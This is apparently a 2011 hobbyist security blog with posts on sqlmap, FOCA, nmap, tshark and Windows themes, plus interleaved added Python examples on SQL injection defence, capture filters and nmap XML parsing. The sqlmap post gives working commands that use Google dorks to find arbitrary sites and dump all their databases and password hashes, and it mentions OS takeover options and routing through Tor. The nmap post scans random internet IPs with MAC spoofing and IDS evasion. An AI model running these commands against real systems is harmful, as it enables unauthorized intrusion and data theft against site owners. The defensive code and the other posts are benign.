Saturday, April 23, 2011

SQLMap - Basic / Intermediate usage

So I've recently been interested in web security a bit more, and while learning more about SQL injection I came across a tool I found handy. This is sqlmap, an SQL injection and database takeover tool. Sqlmap can handle a variety of database management systems such as MS SQL, MySQL, Oracle and so on. It supports five injection techniques: boolean-based blind, time-based blind, error-based, UNION query and stacked queries. It can retrieve tables along with their contents. It also has a built-in hash cracking function that attempts to crack known hashes with a dictionary-based attack. It has many other fun features, such as Metasploit interaction for privilege escalation and the use of google dorks, which I will give an example of below.

This command will use a given google dork and attempt to dump all available information from all the results on the first page of google.


python sqlmap.py --dump-all -g "inurl:prodID=3030"

This could come in handy when pentesting, because you can use google dorks to focus in on the target and spider it for specific pages or for more possible vulnerabilities, or just use it for general dork fun. You can also choose a different page of google results, as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an SQL injection is found, we'll add the --beep option.


python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep


Another possibility, when going after a specific target in a pentest, is to do something like this;


python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify certain things to extract to save time, as I'm sure you'll see. To start off we will fingerprint the system (-f) to get an idea of what we're dealing with. Then we will enumerate the databases and tables with verbosity and proceed to issue another command to extract the current user and password hashes.


python sqlmap.py -u www.example.com/shop/prodID=777 -f


If all's well we'll proceed to issue the following commands; --batch automates the process (it never asks for user input) and --eta shows the estimated time:

python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta

Now we know the example_DB database has a table named ex_admin, so we'll dump that table (its columns and their contents).


python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta


If we wanted to do this via a proxy, we can use the --proxy flag as shown below. We'll assume you've got Tor and Polipo up and running (Polipo listens on port 8123 by default).

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123


You can also brute force common table and column names with the --common-tables feature, and play around with the OS takeover portion of it with --os-pwn (which utilizes Metasploit) and --os-shell.


There's a lot more this tool can do, so check out the following site to learn more: http://sqlmap.sourceforge.net/doc/README.html#ss1.2

You may also find this sql "cheat sheet" useful - http://sql-tutorial.net/SQL-Cheat-Sheet.pdf
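Since the whole post is about what sqlmap does to a parameter like prodID, here is the underlying flaw itself, as an added example that is not from the original post or from sqlmap: a vulnerable product lookup next to a hardened one, run against a small in-memory SQLite database constructed for the example (table and product names are made up).

```python
"""Added example (not from the original post or sqlmap): the class of flaw
sqlmap probes for in a parameter like prodID, shown as a vulnerable lookup
beside a hardened one against an in-memory SQLite database built here."""
import sqlite3


def build_db():
    """Constructed sample shop database with three products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (prodID INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        (777, "Widget", 9.99),
        (3030, "Gadget", 19.99),
        (42, "Gizmo", 4.5),
    ])
    return conn


def lookup_vulnerable(conn, prod_id):
    """The bug sqlmap detects: the request parameter is pasted into the SQL
    text, so whatever the client sends becomes part of the query."""
    sql = "SELECT prodID, name, price FROM products WHERE prodID = " + prod_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, prod_id):
    """Hardened form: validate the parameter's type, then bind it as a value.
    The database receives a fixed statement plus an integer, never SQL text."""
    try:
        pid = int(prod_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not a plain product number
    sql = "SELECT prodID, name, price FROM products WHERE prodID = ?"
    return conn.execute(sql, (pid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # A boolean-based probe of the kind sqlmap sends: the condition is true
    # for every row, so the vulnerable version returns the whole table.
    probe = "777 OR 1=1"
    print("vulnerable:", lookup_vulnerable(db, probe))   # all three rows
    print("hardened:  ", lookup_safe(db, probe))         # []
    print("hardened, legit:", lookup_safe(db, "777"))    # one row
```

The hardened lookup is what makes sqlmap's boolean-based, UNION and stacked-query tests come back negative: the parameter can no longer change the shape of the statement, only the value compared against.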

Sunday, April 17, 2011

FOCA - Extracting metadata from documents.

I was watching random defcon lectures and came across one that interested me, which was about FOCA. FOCA can be used to extract metadata from within documents and JPEGs. Now you may be asking, "what is metadata?", and in crude terms you could think of it as "data within data" or "data about data". Using FOCA you can extract information ranging from the OS and user that created a file to the type of device used and its GPS position at the time a picture was taken. You can also use it to spider websites in search of files, as well as to assist you in "google hacking" (i.e. using google dorks to find specific information or files). It could be a good help in a pentest or something of the sort.

Below you can find a link to where you can download FOCA as well as the lecture that sparked my interest in the first place.


http://www.informatica64.com/DownloadFOCA/

There's also a website that you can use to extract the metadata from a document on the fly.

Here's the lecture that caught my interest in the first place. It's presented by the developers at defcon and goes into detail about what this tool can do and how to use it. 


Saturday, April 16, 2011

Changing themes in Windows 7 Starter / Personalizing Win7

Well I recently bought a new netbook and like so many others I got one with Windows 7 Starter not knowing it was crippled, though I had planned to put linux on it to dual boot for whatever OS was needed for the particular task. I was kind of disappointed that I couldn't change the theme to anything besides the default and the older themes. Then I came across one solution which was the "Stardock" theme manager. It comes with a few free themes and I actually like the default one so that works for me. There's also a dock you can use to help personalize the OS, but I've only got 1G of RAM so I don't have the memory to waste on one. So on that note I'll show you what mine looks like as of now, haven't really done much personalizing myself. Just wanted something other than the default themes and that damn background. 


You can download this theme manager from the the following URL;

There's also fences which I enjoy, they're nice and don't consume much memory. 
You can find more information on fences here http://www.stardock.com/products/fences/


Monday, April 11, 2011

Digging deeper with Nmap

Okay, everyone knows the basic nmap usage, such as treating all hosts as online with the "-PN" option, or probing ports to determine what services/versions are running with the "-sV" option, but I wanted to talk about a little bit more than that.


Here we will spoof our MAC address while scanning an intruder connected to our network in order to determine what services they're running, then log in XML format for further analysis while only displaying the open ports.


nmap 192.168.1.100 -sV --spoof-mac Cisco -oX nlog --open


We can also play with the nmap scripts that come packaged with the tool; these are excellent, and if you haven't used them before then you're missing out. We will use the discovery scripts to obtain more information.


nmap 192.168.1.100 -sV --spoof-mac Cisco -oX nlog --open --script=discovery


We could also increase the intensity of the service detection (-sV) with "--version-all". This would try every probe that's available. We may also want to enable OS detection by issuing the "-O" option. We could also just use the "-A" option to enable OS and service detection, traceroute and default script scanning. Keep in mind doing this would make for a noisy and potentially detectable scan.


In addition to the discovery scripts we could use other script categories such as the "intrusive" or "auth" categories which you can read more about here - http://nmap.org/book/nse-usage.html

We can also do things to increase anonymity and evade Intrusion Detection Systems (IDS), such as using the SYN stealth scan (-sS), appending random data to the packets sent (--data-length) and fragmenting them (-f); we will also use the "-iR" option to scan random IPs.

nmap -iR 100 -sS --spoof-mac Cisco --data-length 9 -f


That's where I'll end this little "tutorial", hope someone finds this useful.

Sunday, April 10, 2011

Basic Tshark Capture Filters

Well I've been playing around with Tshark so I decided I should make a quick post on using basic filters because it's a great feature and really makes Tshark worth using. For those who don't know what Tshark is, it's the terminal based version of Wireshark.


Getting down to it, if we want to only monitor activity on a certain port, IRC for example, we would issue the following command.


tshark -f "tcp port 6667" -i eth0


If we wanted to log the packets we could do this;


tshark -f "tcp port 6667" -w /home/tlog -i eth0


This would log the packets but wouldn't show them in real time, so to override that we can add "-S". You can also just use -f "port 6667" if you want both UDP and TCP packets. You can also increase the information that's displayed by increasing the verbosity with "-V".


tshark -f "port 6667" -w /home/tlog -S -V -i eth0


If we were looking to capture only traffic coming from a specific website, we could use the following;


tshark -f "src www.hakhub.blogspot.com" -w /home/tlog -S -V -i eth0


You could also specify a port like this;


tshark -f "src www.hakhub.blogspot.com and port 80" -w /home/tlog -S -V -i eth0


And this is where I'll end this example of the tshark capture filter usage, there's also a read filter which you can find more information about here - http://www.wireshark.org/docs/man-pages/wireshark-filter.html
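The filters above differ in ways that are easy to miss ("port 6667" matches UDP as well as TCP, and a qualifier without src/dst matches either end of the packet). The following added example, which is not from the original post and is not tshark or libpcap code, is a toy evaluator for just the subset of capture-filter syntax used in this post, run over packets constructed here. Unlike libpcap it compares host names literally instead of resolving them to addresses, and it supports neither parentheses nor "not".

```python
"""Toy evaluator for the capture-filter subset used in the post (added
example, not tshark or libpcap code). It compares host names literally,
whereas libpcap resolves them to addresses before matching."""
from dataclasses import dataclass


@dataclass
class Packet:
    proto: str   # "tcp" or "udp"
    src: str     # source host
    dst: str     # destination host
    sport: int   # source port
    dport: int   # destination port


# Constructed sample traffic: IRC over TCP and UDP, plus web traffic to and
# from the blog's host.
SAMPLE = [
    Packet("tcp", "10.0.0.5", "irc.example.net", 51000, 6667),
    Packet("udp", "10.0.0.5", "irc.example.net", 51001, 6667),
    Packet("tcp", "www.hakhub.blogspot.com", "10.0.0.5", 80, 51002),
    Packet("tcp", "www.hakhub.blogspot.com", "10.0.0.5", 443, 51003),
    Packet("tcp", "10.0.0.5", "www.hakhub.blogspot.com", 51004, 80),
]


def compile_primitive(words):
    """Turn e.g. ['src', 'host', 'x'] or ['tcp', 'port', '80'] into a predicate.
    As in libpcap, the type qualifier defaults to 'host' when omitted, and a
    qualifier without src/dst matches either end of the packet."""
    if len(words) == 1 and words[0] in ("tcp", "udp"):
        return lambda p, proto=words[0]: p.proto == proto
    *quals, value = words
    proto = direction = None
    kind = "host"
    for q in quals:
        if q in ("tcp", "udp"):
            proto = q
        elif q in ("src", "dst"):
            direction = q
        elif q in ("host", "port"):
            kind = q
        else:
            raise ValueError(f"unsupported qualifier {q!r}")
    if kind == "port":
        value = int(value)

    def pred(p):
        if proto and p.proto != proto:
            return False
        if kind == "port":
            ends = {"src": [p.sport], "dst": [p.dport], None: [p.sport, p.dport]}
        else:
            ends = {"src": [p.src], "dst": [p.dst], None: [p.src, p.dst]}
        return value in ends[direction]
    return pred


def _split(words, sep):
    """Split a token list on a keyword ('and' / 'or')."""
    groups, cur = [], []
    for w in words:
        if w == sep:
            groups.append(cur)
            cur = []
        else:
            cur.append(w)
    groups.append(cur)
    return groups


def compile_filter(expr):
    """'and' binds tighter than 'or', as in pcap-filter."""
    alternatives = [[compile_primitive(prim) for prim in _split(conj, "and")]
                    for conj in _split(expr.split(), "or")]
    return lambda p: any(all(pr(p) for pr in conj) for conj in alternatives)


def apply_filter(expr, packets):
    matches = compile_filter(expr)
    return [p for p in packets if matches(p)]


if __name__ == "__main__":
    for expr in ("tcp port 6667", "port 6667",
                 "src www.hakhub.blogspot.com",
                 "src www.hakhub.blogspot.com and port 80"):
        print(f"{expr!r}: {len(apply_filter(expr, SAMPLE))} packet(s)")
```

Run it and compare the counts: "tcp port 6667" keeps one packet, "port 6667" keeps two, and "src www.hakhub.blogspot.com and port 80" keeps only the packet whose source is that host on port 80, not the one going to it.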

Sunday, April 3, 2011

Nmap Log Parser - Creates an IP list from a log

Well, I've made this quick log parser in Java for use with Nmap logs; it grabs the IPs and writes them to another file in list format for use with other tools. Below you can find both the source and the jar.

Source - http://pastebin.com/M5pLbQ2C
Jar - http://www.mediafire.com/?bp86q62t3pdrvd3
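As an added example that is not the author's Java parser and not part of nmap, here is the same idea written against nmap's XML output (the -oX format the "Digging deeper with Nmap" post logs to): it parses the hosts and their ports, then produces an IP list, with an option to keep only hosts that had at least one open port, in the spirit of --open. The XML below is constructed for the example; the addresses and services in it are made up.

```python
"""Added example (not the author's Java parser and not part of nmap): parse
nmap's -oX output to list hosts and their ports, then produce the IP list
the post describes. The XML below is constructed for the example."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX nlog --open 192.168.1.100-102">
  <host><status state="up"/>
    <address addr="192.168.1.100" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.101" addrtype="ipv4"/></host>
  <host><status state="up"/>
    <address addr="192.168.1.102" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
</nmaprun>
"""


@dataclass
class PortInfo:
    number: int
    protocol: str
    state: str
    service: str = ""


@dataclass
class HostInfo:
    ip: str
    ports: list = field(default_factory=list)

    def open_ports(self):
        return [p for p in self.ports if p.state == "open"]


def parse_nmap_xml(xml_text):
    """Return a HostInfo for every host nmap reported as up."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.iter("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip hosts nmap reported as down
        addr = h.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        host = HostInfo(addr.get("addr"))
        for p in h.iter("port"):
            st = p.find("state")
            svc = p.find("service")
            host.ports.append(PortInfo(
                int(p.get("portid")), p.get("protocol"),
                st.get("state") if st is not None else "unknown",
                svc.get("name", "") if svc is not None else ""))
        hosts.append(host)
    return hosts


def ip_list(hosts, open_only=True):
    """IPs of up hosts; with open_only, only those with at least one port
    in state 'open' (the same idea as nmap's --open)."""
    return [h.ip for h in hosts if not open_only or h.open_ports()]


def format_ip_list(hosts, open_only=True):
    """One IP per line, ready to feed to another tool."""
    return "\n".join(ip_list(hosts, open_only)) + "\n"


def write_ip_list(xml_path, out_path, open_only=True):
    """Read an -oX log from disk and write the IP list; returns the count."""
    with open(xml_path, encoding="utf-8") as f:
        hosts = parse_nmap_xml(f.read())
    with open(out_path, "w", encoding="utf-8") as f:
        f.write(format_ip_list(hosts, open_only))
    return len(ip_list(hosts, open_only))


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_XML):
        print(h.ip, [(p.number, p.protocol, p.state, p.service) for p in h.ports])
    print(format_ip_list(parse_nmap_xml(SAMPLE_XML)), end="")
```

Parsing the XML rather than the normal text output is what makes this robust: the text format changes between nmap versions, while the -oX schema keeps its host/ports/port/state structure, and the down host and the "open|filtered" UDP port are handled explicitly instead of by a regular expression.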